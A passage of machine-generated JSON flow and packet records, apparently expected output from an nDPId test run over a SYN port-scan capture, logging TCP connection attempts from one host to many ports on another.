-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJkAADAGb9msEAAIQA2GNIzTBC7dU4MZAAAAAGACBAAwXgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsvKcAADUGVsusEAAIQA2GNIzTCVndU4MZAAAAAGACCAAnMwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMdwAAC8G55asEAAIQA2GNIzTC13dU4MZAAAAAGACEAAdLwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPUAADYGaX2sEAAIQA2GNIzTC5jdU4MZAAAAAGACDAAg9AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE0AADsGBSasEAAIQA2GNIzSIcvdUoMYAAAAAGACEAAGxAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWgYAADoGtGysEAAIQA2GNIzSBw3dUoMYAAAAAGACDAAlggAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs1tAAADcGOqKsEAAIQA2GNIzSZIbdUoMYAAAAAGACEADECAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsK0kAACkG9CmsEAAIQA2GNIzSPX7dUoMYAAAAAGACCADzEAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWw4AADMGumSsEAAIQA2GNIzSA5DdUoMYAAAAAGACEAAk\/wAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAADYGjA+sEAAIQA2GNIzSAtbdUoMYAAAAAGACDAApuQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmFEAADIGfiGsEAAIQA2GNIzSHj3dUoMYAAAAAGACDAAOUgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsd88AAC0Go6OsEAAIQA2GNIzSEjbdUoMYAAAAAGACCAAeWQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmn4AADMGevSsEAAIQA2GNIzSCvDdUoMYAAAAAGACEAAdnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJ0AADoGZdWsEAAIQA2GNIzSGMrdUoMYAAAAAGACDAATxQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAACwGlg+sEAAIQA2GNIzS4cXdUoMYAAAAAGACBABSyQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsGYYAADYG+OysEAAIQA2GNIzSEB7dUoMYAAAAAGACDAAccQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsEPYAAC4GCX2sEAAIQA2GNIzSJMfdUoMYAAAAAGACDAAHyAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SkAAC4GNUmsEAAIQA2GNIzSCHHdUoMYAAAAAGACDAAkHgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAslo0AADMGfuWsEAAIQA2GNIzSAFLdUoMYAAAAAGACEAAoPQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsm08AADAGfSOsEAAIQA2GNIzTBpjdU4MZAAAAAGACBAAt9AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLMAACUGWr+sEAAIQA2GNIzTBBjdU4MZAAAAAGACCAAsdAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAs0ZUAADQGQt2sEAAIQA2GNIzTFFDdU4MZAAAAAGACBAAgPAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsdiIAADQGnlCsEAAIQA2GNIzTI5bdU4MZAAAAAGACBAAQ9gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAz8AADQGETSsEAAIQA2GNIzTgBHdU4MZAAAAAGACBAC0egAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 